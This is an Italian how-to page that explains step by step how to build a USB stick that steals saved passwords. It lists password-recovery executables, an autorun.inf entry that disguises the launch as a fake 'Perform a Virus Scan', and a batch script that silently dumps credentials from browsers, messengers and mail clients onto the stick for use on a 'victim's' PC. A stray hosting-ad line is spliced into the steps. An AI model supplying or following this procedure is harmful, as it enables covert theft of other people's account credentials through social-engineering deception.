Hacker - Creare una penna USB ruba-password

Questa è una procedura trovata su internet, da usarsi solo per fini goliardici e niente piu'. Certo, questo fa capire che se qualcuno inserice una usb nel nostro pc  opportunamente settata in pochi secondi può recuperare tantissime informazioni e password del nostro pc (esistono comunque tutorial molto piu' avanzati su internet).


Molti utenti utilizzano Windows XP/Vista/Windows 7. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti.
Procediamo alla creazione di una penna USB ruba-password che, una volta inserita nel PC della vittima designata, avvia una finta scansione antivirus mentre salva in alcuni file di testo tutte le parole chiave rintracciate in browser, programmi di chat e client di posta elettronica.
Ecco la procedura per crearne una.
  1. Scaricare i programmi MessenPass (recupera password da tutti i più popolari software di IM), Mail PassView (recupera password da tutti i principali client per la posta elettronica), IE PassviewProtected Storage PassView (recupera password da Internet Explorer, Outlook Express ed MSN Explorer) e Password Fox (recupera password da Firefox); (recupera le password da Internet Explorer),
  2. Pop.it - Registrazione domini e hosting economico italia
  3. Copiare gli eseguibili di tutti questi programmi (mspass.exe, mailpv.exe, iepv.exe, pspv.exe e passwordfox.exe) nella directory principale della penna USB da utilizzare come “ruba-password”;
  4. Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come autorun.inf, sempre nella directory principale della penna USB:
  5. [autorun] open=launch.bat ACTION= Perform a Virus Scan
  6. Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come launch.bat, sempre nella directory principale della penna USB:
  7. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
  8. Inserire la penna USB nel PC dal quale s’intende rubare le password e, nella schermata dell’autorun, selezionare la voce Perform a Virus Scan;
  9. Attendere che la finta procedura di scansione antivirus termini e godersi il frutto del proprio lavoro truffaldino (le parole chiave vengono tutte conservate in dei file di testo contenuti nella penna stessa).